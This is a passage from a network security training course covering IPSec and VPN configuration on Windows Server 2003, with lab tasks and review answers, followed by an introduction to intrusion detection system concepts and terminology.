Lesson 6: Implementing IPSec and VPNs 351
The following information may be required for dening packet lters for L2TP
over IPSec VPN traffic on rewall systems:
UDP port 500 allows the Internet Key Exchange (IKE) traffic to access the
VPN server.
UDP port 1701 allows L2TP traffic to move from the VPN client to the VPN
server.
IP protocol ID 50 allows IPSec ESP traffic to move from the VPN server to
the VPN client.
At the rewall, typically all L2TP traffic, including tunnel maintenance and tun-
neled data, is encrypted as an IPSec ESP payload. Figure 6-11 depicts ports and
protocols associated with tunneling protocols.
Figure 6-11: Ports and protocols associated with tunneling protocols.
VPN Authentication
In general, user authentication is based on the following principle: An entity has
authenticating knowledge (what you know), possession of an authenticating
device (what you have), or exhibits a required physiological characteristic (what
you are). Strong authentication requires that at least two of the three factors be
demonstrated.
VPN authentication protocols, which operate at the Data Link layer, include:
Password Authentication Protocol (PAP). PAP is a weak method for authenti-
cation as it uses a cleartext authentication scheme.
Challenge Handshake Authentication Protocol (CHAP). CHAP does not
transmit the actual password and is a stronger authentication protocol than is
PAP. With CHAP, remote customers use a Message Digest 5 (MD5) hash of
their credentials in response to a challenge by a network access server.
Shiva Password Authentication Protocol (SPAP). SPAP is used in mixed
environments that support the Shiva Local Area Network Rover software.
Extensible Authentication Protocol-Transaction Level Security (EAP-TLS).
EAP-TLS is a Microsoft implementation of a strong authentication method
that uses public key certicates.
352 Tactical Perimeter Defense
The IPSec authentication scheme for both AH and ESP uses the Hash-based Mes-
sage Authentication Code (HMAC) authentication code, which uses a shared
secret key between two parties, rather than public key methods, for message
authentication. The generic HMAC procedure can be used with just about any
hash algorithm, although IPSec species support for at least MD5 and Secure
Hash Algorithm 1 (SHA-1) because of their widespread use. In HMAC, both par-
ties share a secret key. The secret key is employed with the hash algorithm in a
way that provides mutual authentication, but at the same time prevents the key
from being transmitted on the line. IPSec key management procedures are used to
manage key exchanges between the two parties via Security Associations (SA).
Key Length
Data is transmitted securely in a VPN by using industry standard IPSec tunneling,
encryption services using DES and 3DES, and MD5 and SHA-1 for message
authentication. IPSec creates private end-to-end pipes, or tunnels, through the IP
network, connecting the designated VPN sites to each other. Unauthorized access
to the information is prevented by the encryption and authentication services,
which are applied.
Encryption systems depend on two mechanisms to guarantee data condentiality.
The encryption algorithm provides the mathematical rules that convert the
plaintext message to a random ciphertext message. The algorithm provides steps
for converting the plaintext message with an encryption key, a block of alphanu-
meric data that introduces the random element into the ciphertext message. The
longer the secret key is, the more time it takes for an attacker to test all possible
values of the key, and determine the plaintext content of the message. In other
words, data that will be of value to an attacker for a long time should be
encrypted with longer keys.
TASK 6H-1
Viewing Firewall-related RFCs
1. Navigate to C:\Tools\Lesson6\RFCs and open rfc-index.wri.
2. Perform a search using the keyword rewall
If you keep clicking Find Next, you will see many hits. Stop when you see
RFC 2979 highlighted. RFC 2979 describes the behavior of and require-
ments for Internet rewalls.
3. Close the le.
4. Navigate to C:\Tools\Lesson6\RFCs and open rfc2979.txt in Notepad.
5. Scroll down to the second paragraph in section 3.1.1, and read the
transparency rule for rewalls.
6. Close all open windows.
Lesson 6: Implementing IPSec and VPNs 353
Topic 6I
Configuring a VPN
Built into Windows 2003s Routing And Remote Access Service (RRAS) is a
single, integrated service that terminates connections from either dial-up or Vir-
tual Private Network (VPN) clients. With RRAS, your Windows 2003 Server can
function as a remote access server, a VPN server, a gateway, or a branch-office
router. You can allow users ready access to the network through the Internet by
implementing a VPN, therefore, greatly reducing direct dial-up costs. Windows
2003 VPNs can be created by using either PPTP or L2TP.
In this topic, you will build a VPN, and the tasks will require three computers.
One computer will be congured as the internal resource, a simple FTP site. The
second computer will be the VPN Server, and this machine will require two net-
work cards. One of the cards on this server will be the connection to the private
network, and the other will be the connection to the remote client. The third com-
puter will function as the network client, the one making the access via the VPN.
The computers will be called: VPN Server, Internal Server, and VPN Client.
About the Tasks
In this task, you will work in pairs, with one student conguring the VPN Server
and the other conguring the VPN Client. The Internal Server is a simple web
page, or ftp site, hosted on the instructor computer, as part of the internal
network.
TASK 6I-1
Configuring the VPN Server
Note: Complete this task only if you are designated as the VPN Server
Note: The VPN Server in these tasks requires a second network card. This can be
an integrated or non-integrated network card. Upon completion of the VPN tasks,
this second network card can be either removed or disabled for the remainder of
the class.
1. Enable the second network card on the server.
2. Assign the second network card with the following IP Address informa-
tion:
IP 10.0.10.x (replace x with your seat number)
SM 255.255.255.0
DG This can be left blank
3. Open a command prompt and verify your NIC and IP Address congu-
ration, by entering the command ipconfig /all
354 Tactical Perimeter Defense
4. Verify that you have one NIC with an address of 172.16.x.x or 172.18.x.x
based on your location in the classroom. Your second NIC has an address
of 10.0.10.x based on your location in the classroom.
5. Write down your 172.16.x.x address as your Internal NIC and your 10.0.
10.x address as your External NIC.
6. Choose StartAdministrative ToolsCongure Your Server Wizard. At
the Welcome screen, click Next.
7. Verify you have met the requirements at the Preliminary Steps screen, and
click Next. The system will now detect your network settings and
conguration.
8. Select the Custom Conguration radio button, and click Next.
9. Select the Remote Access / VPN Server, and click Next.
10. In the Summary Of Selections, verify that you are going to run the Rout-
ing and Remote Access Server to setup routing and VPN, then click
Next. The RRAS Wizard will open at this time.
11. At the RRAS Setup Wizard, click Next.
Lesson 6: Implementing IPSec and VPNs 355
12. Select the Virtual Private Network (VPN) Access and NAT radio button,
and click Next.
13. Select your VPN Network adapter. In this task, this is the NIC that you
have assigned the 10.0.10.x IP address to.
14. Leave the Basic Firewall check box checked, and click Next.
356 Tactical Perimeter Defense
15. Select your internal network for the clients to connect to, and click Next.
16. In the IP Address Assignment screen, select the From A Specied Range
Of Addresses radio button and click Next.
17. In the Address Range Assignment screen, click the New button.
18. These are the IP Addresses of the internal network.
Enter a small range, based on your seating in the classroom, click OK,
verify your addresses are correct, and click Next.
Lesson 6: Implementing IPSec and VPNs 357
19. At the Network Selection window, select the network that has access to
the Internet, and click Next. This is usually the same network as your
internal resource network.
20. At the Name & Address Translation Services window, leave the default of
basic name and address Services, and click Next. If your system does not
show this window, continue to the next step.
21. Review the Address Assignment Range, and click Next. If your system
does not show this window, continue to the next step.
22. For this lesson, you will authenticate locally, so leave the No, Use RRAS
To Authenticate Connection Requests radio button selected, and click
Next.
23. Review your settings, and click Finish. (If you get a prompt to congure
relaying of DHCP messages, click OK.)
358 Tactical Perimeter Defense
24. The Remote Access / VPN Server will now start. Click Finish.
25. Close the Manage Your Server window.
VPN Clients
Generally, the conguration on the client side of the VPN is minimal. The client
needs to know how to make the connection, and needs proper credentials to
authenticate and use the VPN. In the following task, you will prepare the VPN
Server to accept VPN clients.
TASK 6I-2
Configuring VPN Clients
Setup: Complete this task if you are designated as the VPN Server.
1. Choose StartAdministrative ToolsComputer Management.
2. Expand Local Users And Groups (under system tools).
3. Right-click Users and choose New User.
4. In the User Name text box, type VPN1 and enter and conrm a password
of QWERTY1
Uncheck the box to change password at next logon, and click Create.
5. Click Close. One client account is enough for testing purposes.
6. Double-click the new VPN1 user account, and click the Dial-in tab.
Lesson 6: Implementing IPSec and VPNs 359
7. Select the Allow Access radio button and click OK.
8. Close the Computer Management window.
9. Choose StartAdministrative ToolsRouting And Remote Access.
10. Expand your server_name and click Remote Access Policies.
11. Right-click Remote Access Policies, and choose New Remote Access
Policy.
12. In the New Remote Access Policy Wizard, click Next.
13. Leave the Use The Wizard To Set Up A Typical Policy For A Common
Scenario radio button selected.
14. In the Policy Name text box type VPN_Policy_1 and click Next.
15. In the Access Method window, select the VPN radio button and click
Next.
16. In the User Or Group Access window, select the User radio button and
click Next.
17. For the Authentication Method, ensure that only MS-CHAPv2 is checked,
and click Next.
360 Tactical Perimeter Defense
18. For the Policy Encryption Level, only check the box for Strongest Encryp-
tion (MPPE 128-bit) and click Next.
19. Review the settings for this policy, and click Finish.
Establishing the VPN
The following task will require steps on both the VPN Server and on the VPN
Client computers. The VPN Client will connect to the VPN Server, receive an IP
Address and join the private network. The VPN Server will verify the connection
is active, and the VPN Client will then access a resource located on the Internal
Server.
In addition to the VPN Client and the VPN Server, to show the VPN to a higher
level, if there is enough time in the class, create a resource server for the VPN
client to connect to. In the following task, the FTP Server is designed to be run-
ning on the instructor machine, in the middle segment.
Lesson 6: Implementing IPSec and VPNs 361
TASK 6I-3
Establish the VPN
Note: Perform step 1 through step 15 on the VPN Client.
1. Open the TCP/IP Properties of your network card. Edit the IP Address
to be a node on the 10.0.10.X/24 network. You can replace the X with
your seat number.
2. Close the properties of your network card.
3. Open a command prompt.
4. Enter ipconfig to verify your IP Address conguration.
5. Choose StartControl PanelNetwork ConnectionsNew Connection
Wizard.
6. In the New Connection Wizard, click Next.
7. Select the Connect To The Network At My Workplace radio button and
click Next.
8. Select the Virtual Private Network Connection radio button and click
Next.
The Instructor machine
requires a resource for the
VPN client to connect into.
Enable the FTP Service on
your machine, and use that
for your students. If your
class has enough time, run
a packet capture on each
machine to perform a
packet analysis of the
connection and ftp site
access.
362 Tactical Perimeter Defense
9. In the Company Name text box, type SCP VPN and click Next.
10. Enter the IP Address that is assigned to the External NIC of the VPN
Server, and then click Next.
Note: The external IP Address is the one in the 10.0.10.x range.
11. Select the My Use Only radio button and click Next.
12. To complete the creation of the new connection, click Finish.
13. In the screen to connect to the SCP VPN, in the User Name eld, type
VPN1, in the Password eld, type QWERTY1, and then click Connect.
14. Open a command prompt, and enter ipconfig /all
Lesson 6: Implementing IPSec and VPNs 363
15. Note that you have been assigned an IP Address from the VPN Server,
and that the IP Address is part of the Internal network.
Note: Perform step 16 through step 19 on the VPN Server
16. Choose StartAdministrative ToolsRouting And Remote Access.
17. Expand your Server name.
18. Click Remote Access Clients.
19. In the right pane, double-click the connection to see the IP Address that
was assigned, and other statistics.
Note: Perform step 20 through step 24 on the VPN Client
20. In the command prompt, enter ftp 172.17.10.1
(If your instructor changed the IP Address of the Internal Server, use the
address as provided.)
21. Enter annonymous as the username with no password.
22. Once connected, enter dir to list the contents of the ftp site.
23. When done browsing the ftp site, enter bye to end the session.
24. Close all windows.
Returning the Classroom Setup to its Original State
To ensure the remaining tasks in this course work properly, the VPN implementa-
tion lab must be torn down, and the classroom environment returned to its
original state. Be sure not to skip this quick section.
TASK 6I-4
Restoring the Classroom Setup
1. On the VPN Server, choose StartAdministrative ToolsCongure Your
Server Wizard.
2. In the Welcome Screen, click Next.
3. In the Preliminary Steps Wizard, click Next.
4. Click Remote Access / VPN Server, and click Next.
5. Check the Remove The Remote Access/VPN Server Role check box and
click Next.
6. At the prompt that you are disabling the router, click Yes.
364 Tactical Perimeter Defense
7. When the VPN Server Role has been removed, click Finish.
8. Disable the External NIC on the VPN Server.
9. Open a command prompt, and ensure that you are only running the
Internal NIC with the 172.x.x.x address by entering ipconfig
10. On the VPN Client, choose StartConnect ToShow All Connections.
11. Right-click the SCP VPN connection, and choose Delete.
12. In the conrmation prompt, click Yes.
13. Open the properties of your NIC and return the IP Address to your
original conguration, then click OK. (The 172.x.x.x address.)
14. Close all windows.
Summary
In this lesson, you worked with a Microsoft Management Console (MMC).
You congured an MMC and viewed the default or built-in IPSec policies.
You then created custom IPSec policies. You implemented and tested these
policies. You also took a rst look at implementing lter lists and experi-
mented with a couple of authentication methodspreshared keys and
certicates.
Lesson Review
6A What are the two protocols in IPSec that are used to protect network
traffic?
The Encapsulating Security Protocol (ESP) and the Authentication Header
(AH).
What are the two main modes of implementation for IPSec?
Transport Mode and Tunnel Mode.
If you are going to set up a VPN with IPSec, what mode will you prob-
ably use?
Tunnel Mode.
6B What are the three default IPSec policies in Windows 2003?
Server (Require Security), Server (Request Security), and Client (Respond
Only).
What integrity algorithms are supported in Windows 2003 IPSec?
MD5 and SHA-1.
Perform step 10 through step
14 on the VPN Client.
Lesson 6: Implementing IPSec and VPNs 365
What encryption algorithms are supported in Windows 2003 IPSec?
DES and 3DES.
6C What authentication methods are supported in Windows 2003 imple-
mentation of IPSec?
Kerberos, Certicates, and Preshared Keys.
What are the default key lifetimes?
A new key is generated for every 100 MB of data exchanged between the
two IPSec devices or every 15 minutes, whichever is earlier.
6D When would ESPs integrity check be most usefully employed?
When implementing IPSec in Tunnel Mode. ESPs integrity check at the tun-
nel endpoint will ensure the integrity of the payload (including the
encapsulated packet, internal IP headers, and all other data).
Using lters, it is possible to explicitly control IPSec traffic.
6E Describe all of the key components of a VPN.
VPN server, VPN client, tunnel, VPN connection, tunneling protocols, tun-
neled data, and transit network.
Identify the key VPN tunneling protocols.
PPTP, L2TP, and IPSec.
6F What are the differences between the tunneling protocols PPTP and
L2TP?
PPTP uses separate channelsa control stream that runs over TCP, and a
data stream that runs over GRE. L2TP uses UDP. PPTP is generally associ-
ated with Microsoft, and Microsoft uses MPPE for encryption. L2TP uses
IPSec for encryption.
What are the differences between IPSec Tunnel and Transport Modes?
In IPSec Tunnel Mode, one packet is encapsulated or tunneled in another;
while IPSec Transport Mode secures the packet exchange end-to-end, source
to destination. IPSec Tunnel Mode is used primarily for link-to-link packet
exchanges between intermediary devices like routers and gateways. Trans-
port Mode provides the security service between the two communicating
endpoints.
What is a Security Association (SA)?
A Security Association (such as ISAKMP) determines which algorithms will
be used for the session, how the key exchange will take place, and how often
keys will need to change.
What are the two types of SAs?
Transport Mode SA and Tunnel Mode SA.
366 Tactical Perimeter Defense
How does IKE relate to ISAKMP and Oakley?
ISAKMP denes procedures and packet formats to establish, negotiate,
modify, and delete SAs. It also provides the framework for exchanging infor-
mation about authentication and key management, but it is completely
separate from key exchange. Oakley describes a scheme by which two
authenticated parties can exchange key information. Oakley uses the Diffe-
Hellman key exchange algorithm. IKE is the result of combining both
ISAKMP and Oakley protocols.
6G Identify key design issues related to IPSec VPNs.
IPSec encryption scheme, IPSec management strategy, negotiation policies,
security policies, IP lters, and security levels.
Identify specic challenges associated with VPN implementation.
Diffculty with centralized management of client policy, conguration and
strong authentication requirements; lack of protocol interoperability (for
example, interoperability between NAT, IPSec, and PPTP), complexity of
infrastructure, addressing and routing, and administration.
6H What is PAP? What is CHAP? Briey describe the differences between
them.
PAP and CHAP are both authentication protocols. PAP uses cleartext
authentication, while CHAP relies on encryption mechanisms.
Describe the security issues related to having a VPN server in front of
the rewall (exposed to the Internet connection) or having a VPN server
(in the DMZ) behind the rewall.
By placing a VPN device in front of your rewall, you will be terminating
secure traffc in a public zone. You will need to assign addresses to users
from a certain block of IP addresses and open a large hole in the rewall
for access from these IP addresses. A potential advantage to doing this
would be that you could then use your existing rewall to control the desti-
nation of traffc, but most VPN boxes will also allow you to do this.
By placing a VPN device behind an existing rewall, you will need to
change the conguration of your rewall. You will also need a rewall smart
enough to be able to congure a lter to pass the VPN traffc. Depending on
how your network is set up, this may also allow you to make use of only one
of the two or more Ethernet ports on your VPN device.
If a VPN server is using PPTP, which ports would you need to provide
access through a rewall system?
TCP port 1723 allows PPTP tunnel maintenance traffc to move from the
PPTP client to the PPTP server.
IP protocol type 47 allows the PPTP tunneled data to move from the PPTP
client to the PPTP server.
Lesson 6: Implementing IPSec and VPNs 367
Which ports are associated with L2TP and a VPN?
UDP port 500 allows the Internet Key Exchange (IKE) traffc to access the
VPN server.
UDP port 1701 allows L2TP traffc to move from the VPN client to the VPN
server. IP protocol ID 50 allows IPSec ESP traffc to move from the VPN
server to the VPN client.
What are security vulnerabilities of a VPN? What technologies can be
used with a VPN to make it more secure?
Key management is a critical security vulnerability of a VPN. PKI technolo-
gies can be used with a VPN to make it more secure.
6I What is the encryption standard supported by Microsofts implementa-
tion of PPTP?
MPPE.
What are the transport protocols used by PPTP and L2TP?
PPTP uses TCP, and L2TP uses UDP.
368 Tactical Perimeter Defense
Designing an Intrusion
Detection System
Overview
In this lesson, you will be introduced to the concepts surrounding one of the
areas critical to the defensive network protection schemethe Intrusion
Detection System. This system, in conjunction with the rewall technologies
in place, is the basis for a very solidly defended network. The Intrusion
Detection System will be used to detect when an intruder is attempting pen-
etration of the network or tampering with the rewalls.
Objectives
To design an Intrusion Detection System, you will:
7A Examine the goals of Intrusion Detection Systems.
Given the components of Intrusion Detection Systems, you will describe
how the components interact to accomplish the goals of intrusion
detection.
7B Describe the technologies and techniques of intrusion detection.
Given a scenario of users in a network, you will examine the process of
intrusion detection and how behavioral use is implemented in the IDS.
7C Describe host-based IDSs.
Given a network of connected hosts, you will describe how host-based
IDSs identify an intrusion.
7D Describe network-based IDSs.
Given a network of connected hosts, you will describe how network-
based intrusion detection systems identify an intrusion.
7E Examine the principles of intrusion detection data analysis.
Given an example signature of an incident, you will examine the concepts
and methods of data analysis.
7F Describe the methods of using an IDS.
Given network scenarios, you will identify multiple uses of IDS for
detection of, monitoring of, and anticipation of attacks.
Data Files
none
Lesson Time
2 hours
LESSON
7
Lesson 7: Designing an Intrusion Detection System 369
7G Dene what an IDS cannot do.
Given a network situation, you will identify the functions an IDS cannot
complete.
370 Tactical Perimeter Defense
Topic 7A
The Goals of an Intrusion Detection System
As the months and years go by, security professionals have an increasingly diffi-
cult task of keeping the network secure. What makes this job so difficult? Is it the
fact that there are more threats than ever? Perhaps, but there is more to it than
that. Is it the fact that there are more people on the Internet year after year? It
contributes, but there is more to it than that, too.
As you build complex interconnected networks, where partners from the outside
require access to the inside, where you have employees telecommuting, and
where you have internal connections to external suppliers, the problem grows. It
is the very nature of the industry to be even more connected.
This connection comes with a price. The price is the extreme difficulty in secur-
ing the network. In order for networks to continue to grow and be functional,
there must be a certain degree of trust built into the systems. However, on top of
the level of trust, there must be verication of this trust. The method most often
employed by organizations these days is a solid Intrusion Detection System
(IDS).
The three general components of network security from a need perspective are
shown in Figure 7-1.
Figure 7-1: Components of network security.
Most security analysts and professionals are at least familiar with these concepts.
Over the last 30 years or so, most organizations had focused the vast majority of
their time, energy, and budget on prevention. The logic seemed obviousif it
were possible to stop the majority of threats from getting in, then the network
could be reasonably secured.
Then came the networks of today. These complex, interconnected networks do
not have this clear-cut boundary, where the goal is to keep the bad people out and
the good people in. Reliance on perimeter defense of a rewall alone is no longer
adequate.
Perhaps even more of an issue is the fact that most organizations do not have
systems in place to detect the very attacks that can lead to nancial loss. This
again proves that the rewall defense is not enough. The ability to detect intru-
sion through defense is critical to the overall security of the network.
What is Intrusion Detection?
Before you can get into a detailed denition of intrusion detection, lets return
briey to the standard network defense system. The common method for protect-
ing the network is to follow the layered defense policy. While this is a solid base
to network security, it does have its limitations.
Lesson 7: Designing an Intrusion Detection System 371
A common analogy to this problem is to investigate the castle structure (or for-
tress structure) of centuries ago. As you discussed earlier, the fortress would have
a large, thick stone wall surrounding the main structure. There would perhaps be
a large moat on the outside of the wall, with only a large drawbridge as an
entrance.
This presented a solid defense, and there are many instances recorded of a small
group of soldiers holding off many times the number of attackers. The question
then arises, if the defense was so strong, why did the fortress model fade away?
The attackers got smarter. They realized that attacking the front door was effec-
tive at times, but the losses could be enormous to gain entry. The attackers also
realized that the soldiers inside the fortress seemed to be getting new supplies,
but no one was seen going through the front door. This indicated a hidden door
elsewhere, as was often the case. This hidden back door would be the key to the
attackers capturing the fortress.
What is the solution to the back door? Many in the fortress assumed the back
door was secure, and with all the ghting on the front, there were little resources
left to guard the hidden entrance.
The swarming attackers, once inside, would seize the fortress from the inside out,
and quickly overwhelm the one soldier left there to guard this door. Had solid
intrusion detection systems been in place, odds are that the fortress would not be
so quick to fall.
Although this is a fun analogy (except for the soldiers!), it is quite correct.
Todays modern networks are well guarded with rewalls. But, there needs to be
a way to know if someone is trying to get through a side door, a hole in the
rewall, or if people on the inside of the rewall need monitoring.
The solution of adding layers may help with the defense, but as layers are added,
the function of the network often suffers. It becomes more tedious to allow a
single connection through from a remote supplier when there are ve layers to
navigate.
This is where intrusion detection comes in. By itself, intrusion detection will not
prevent access to resources. However, it is a method to use in identication of
criminal activity, assistance in gathering evidence, and, perhaps most importantly,
indication of attacks in progress.
Intrusion detection is the process of detecting and responding to computer and/or
network misuse. Throughout this lesson, you will be introduced to the different
options of detection and the ways to dene misuse. Some of the questions you
will need to answer are:
What constitutes an intrusion?
What is our denition of detection?
What is our denition of misuse?
How will we dene a false-positive?
How will we dene a false-negative?
372 Tactical Perimeter Defense
Some Intrusion Detection Definitions
As you get further into this lesson, you need to be aware of some of the common
IDS terms and their denitions. There are many denitions of IDS terms; the
ones that follow are intended to give you a basic level of understanding. This is
not intended to be a complete glossary, but the terms that are required for this
lesson and the discussion of IDSs are listed in the following table.
Term Denition
Intrusion Unauthorized access to, and/or activity in, an information system.
Misuse Improper use of resources inside the organization, regardless of
intention.
Intrusion detection The process of detecting unauthorized access or attempted
unauthorized access to resources.
Misuse detection The process of detecting unauthorized activity that matches
known patterns of misuse.
Anomaly detection The process of detecting any variations from acceptable network
use and activity, based on known patterns of use.
Vulnerability scanners The process of examining systems to locate problems or areas
that could indicate security vulnerabilities.
Security vulnerabilities A feature or error found in system software or system
congurations that provides a method of entry for an attacker, or
provides for an opportunity for misuse.
Some of the groups that you might want to research for further denitions and
standards on IDS are: the Recent Advances in Intrusion Detection (RAID) group,
the Intrusion Detection Sub-Group (IDSG) of the Presidents National Security
Telecommunications Advisory Committee (NSTAC), and the Intrusion Detection
Systems Consortium (IDSC).
The IDS Matrix
Figure 7-2 is an interesting true-false matrix showing the relationship between
IDS congurations and alarms going on or off in response. Very simply put, any
IDS has to be trained to look for trouble, by programming in one or more signa-
tures, where a signature can be considered a representation of patterns of traffic
or behavior that spells trouble.
Lesson 7: Designing an Intrusion Detection System 373
Figure 7-2: The classic true-false matrix of IDS.
Think of a police officer who has just pulled over a car. The officer walks over
and asks the driver for his license and registration. The driver starts to reach into
his jacket.
To a trained officer, this is a signature action representative of someone reaching
for a handgun. According to the training the officer has received, an alarm should
go off in his head. He should yell at the driver to freeze, and then very rmly
order the driver to step out and search him for a handgun.
Now, in the above scenario, if the officer does discover a handgun, it is represen-
tative of a true-positive. If there is no handgun, it is representative of a false-
positive.
Lets change the scenario a bit. If the officer is not trained well, the action of the
driver reaching into his jacket will not be seen as a signature action of someone
reaching for a handgun. According to the training the officer has received, no
alarms go off in his head. He doesnt yell at the driver to freeze. You might say
here that the officer has been inadequately programmed.
In this changed scenario, the officer does not see the action of the driver reaching
into his jacket as a threat, and if the driver simply pulls out his license and regis-
tration from his jacket, it is representative of a true-negative. However, if the
driver does pull out a handgun, it is a false-negative!
As much as most of us would want to live in a world of the true-negative, it is
unfortunately not the case. There are large numbers of true-positives (still OK)
and many false-positives that you have to put up with. Then there is the compla-
cent but dangerous world of false-negatives.
To summarize:
If the conguration of signatures is done right for the environment that the
IDS is in, the state of the IDS is TRUE.
If the conguration of signatures is not done right for the environment that
the IDS is in, the state of the IDS is FALSE.
If the alarms go off as programmed, its said to be POSITIVE.
If the alarms do not go off as programmed, its said to be NEGATIVE.
Given the previous analogy with respect to an IDS, you can dene the states in
the following table.
374 Tactical Perimeter Defense
State Description
True-positive The event when an alarm is indicating an intrusion when there is an actual
intrusion.
False-positive The event when an alarm is indicating an intrusion when there is no actual
intrusion.
True-negative The event when an alarm does not occur and there is no actual intrusion.
False-negative The event when an alarm does not occur when an actual intrusion is carried
out.
IDS Components
An IDS in a network of today is a group of processes working together, and, in
virtually every case, these processes are on different computers and devices
across the network. The very nature of an IDS has grown from its rather simple
name. Todays IDS is much more than a detection of intrusion. Most IDSs will
have the abilities to do one or more of the following:
Recognition of patterns associated with known attacks.
Statistical analysis of abnormal traffic patterns.
Assessment and integrity checking of dened les.
Monitoring and analysis of user and system activity.
Network traffic analysis.
Event log analysis.
Although the systems vary from vendor to vendor, these features of IDSs have
similar requirements for implementation. These components are generic, meaning
that most IDS applications will have these in one form or another.
The Command Console
The command console is where the IDS is monitored and managed. It maintains
control over the IDS components, and the console should be accessible from any
location. Generally, the command console will maintain open channels between
network sensors over encrypted paths, and is a dedicated machine.
The Network Sensor
Network sensors are programs that run on network devices or dedicated
machines, or both, on essential network segments. The network sensors may be
dened as agents, and they are often congured in promiscuous mode. Sensor
placement is critical in the network because there could be thousands of targets
that need monitoring.
When all networks used hubs, you could place a sensor on any port of the hub,
since all traffic is sent out from all ports of a hub, and the tap could detect any
anomalous traffic. However, when the conversion to switches happened, this
changed things for the hub. Switches send traffic only to the correct host, and so
a tap may miss communication on a switch.
To address this issue, a common conguration technique is to use switches that
have an expansion port on them (much of the newer networking equipment has
this), and connect the IDS to this expansion port.
Lesson 7: Designing an Intrusion Detection System 375
These ports are known as Switched Port ANalyzer (SPAN) ports. SPAN ports can
be congured by the security professional to mirror all switch transmissions so
that the single port can be used by the IDS to monitor designated traffic.
The Network Tap
The network tap is a hardware device that sits on the network, can be rack
mounted, andto the untrained eyecan appear to be a hub or a switch. As part
of an IDS, the network tap, which has no IP address, sniffs network traffic and
sends an alert when an intrusion is detected.
Having a network tap in your network-based IDS will make the overall system
more secure, as attacking the hardware device is not an effective technique for
the vast majority of attackers. Although widely considered a solid tool in your
IDS arsenal, there are design issues you will have to overcome for proper tap
deployment.
Network taps require the monitoring of two data streams, for the two directions
of your full duplex network traffic. Although you will be able to monitor your
networks traffic using two streams, this might present a cumbersome solution for
your environment. Newer products are designed to combine the two streams so
that you will need only one connection from the tap to monitor all traffic.
Alert Notification
Alert notication is the portion of the system that is responsible for contacting
the incident handler. Modern IDSs can provide alerts via many options such as
pop-up windows, audible tones, paging, email, and Simple Network Management
Protocol (SNMP).
Realistic Goals of IDS
Although there are varied goals for intrusion detection from organization to orga-
nization, there are two that can generally be counted on being present. The two
general goalsaside from the initial detection itselfare response and
accountability.
The IDS Response
When discussing the response of an IDS, one must recognize rst what it is. A
response is the end result of an IDS analyzing data. The end result is a result
calling for action. The action is what must be dened.
The most common response is not quite as exciting as many security profession-
als would likeit is a simple entry placed in the log le. Even though the log
le entry does not have the glamour of a Hollywood intrusion response, it may
turn out to be the most useful. The log le report has the data that many organi-
zations will use in determining the overall IT security budget.
Other responses can include a trigger that will issue a call to the security archi-
tects pager, or even a pop-up window or email message. During an attack, the
response can also be the ability to have the network modify itself. A command
may be issued to change or block port numbers, or to disable services. This
response during an attack can prove to be the vital element that keeps the net-
work from compromise.
SNMP:
(Simple Network
Management Protocol)
Software used to control
network communications
devices using TCP/IP.
Exercise caution in
determining the level of
response to incidents.
Aggressive or offensive
responses may open up the
organization to serious legal
issues. It is suggested that
legal counsel is consulted
during response decisions.
376 Tactical Perimeter Defense
Accountability
Having the response options is a valuable portion of all IDSs and should be con-
gured as part of the network security policy, but many systems must provide
proper accountability as well. This accountability provides the option to trace the
misuse event of intrusion to the responsible party.
Accountability is one of the hardest tasks in implementing an IDS, given that
users change systems and attacks can come from spoofed sources. This is a criti-
cal step in the overall protection of a network, however, and this becomes even
more evident in the event that the organization pursues legal avenues against an
attacker. Ideally, the accountability system will enable the Security Professional to
locate not only the computer used in the attack, but its physical location and, if
possible, the user who initiated the attack.
TASK 7A-1
Describing Alarms
1. Describe the differences between a false-positive alarm and a false-
negative alarm.
A false-positive is when an alarm indicates an intrusion when there is no
actual intrusion. A false-negative is when an alarm does not occur when an
actual intrusion is carried out.
Topic 7B
Technologies and Techniques of Intrusion
Detection
Now that you are armed with the basics of intrusion detection, lets build on your
new knowledge. The next step is to investigate the technologies and techniques
commonly associated with IDSs.
Lesson 7: Designing an Intrusion Detection System 377
The Intrusion Detection Process
To further dene how IDS functions, lets examine a case with IDS in action. In
this example, you will look at a system in an Ethernet network with the sensor
running in promiscuous mode, sniffing packets off the local segment.
1. A host creates a network packet. So far, nothing is known other than a
packet exists that was sent from a host in the network.
2. The sensor on the network reads the packet in real time off the network
segment. This sensor needs to be placed so it can read the packet.
3. The detection program in the sensor matches the packet with known signa-
tures of misuse. When a signature is detected, an alert is generated, which is
sent to the command console.
4. The command console receives the alert, and in turn noties the designated
person or group of the detection. (The alert is done via a predened method,
email, pop-up window, page, and so on.)
5. The response is created in accordance with the programmed response for this
matching signature.
6. The alert is logged for future reference, either locally or in a database.
7. A summary report is created with the incident detailed.
8. The alert is viewed with other historical data to determine if there is a pat-
tern of misuse or to indicate a slow attack.
promiscuous mode:
Normally, an Ethernet
interface reads all address
information and accepts
follow-on packets only
destined for itself, but when
the interface is in
promiscuous mode, it reads
all information (sniffer),
regardless of its destination.
378 Tactical Perimeter Defense
Figure 7-3: A visual example of the IDS process.
Figure 7-3 is only one example of the potential process of the IDS. As you
progress through this lesson, you will see different processes.
Behavioral Use
For the system to generate the correct response in the correct situation, it must be
programmed with starting data. The starting data is where misuse is dened
(along with alerts and response techniques). If the system is expected to deter-
mine misuse, then the individual who programs this data needs to know how the
organization denes misuse.
Lesson 7: Designing an Intrusion Detection System 379
A starting point for this process is to determine the network activity that the IDS
will attempt to deal with. The following diagrams illustrate the various steps in
determining use, both acceptable and unacceptable. Figure 7-4 shows all the uses
of a network.
Figure 7-4: All of the uses of the network.
In Figure 7-5, you can see that a basic clarication between acceptable and unac-
ceptable use has been made, according to the security policies that are applicable
to the usage categories. (Only some of the options that the security policy may
cover are included in this example.)
The security policy for this organization might include the following:
No users are allowed to telnet to remote hosts.
Users can open only the les they are allowed to open.
Users can access network printers only in their allocated areas.
Users can execute only those applications they have been granted access to
use.
380 Tactical Perimeter Defense
Figure 7-5: The dividing line between acceptable and unacceptable use of resources.
In order to meet these policy requirements, you must divide network and resource
access to acceptable and unacceptable use. At this point, you have categorized
resource use to dene what is considered acceptable and unacceptable. This is a
generalization for the entire network, with the given that there will be exceptions
made for specic users.
From this diagram, you can see that the dividing line species that telnet is unac-
ceptable, as is opening of unauthorized les, trying to execute applications
without permission to do so, or attempting to use unauthorized network printers.
Once this dividing line has been created, the rules for the IDS can be
implemented. This is where the task increases, as the number of signatures of
known attacks and intrusions is the limitation. If the company has unique applica-
tions, the IDS must be made aware of the corresponding signatures. Remember,
an IDS can only do what it is told to do, just like any other component of the
network.
Although the line in our example is a nice solid line between acceptable and
unacceptable, in reality, there are times when the line is not so clear. Crossing
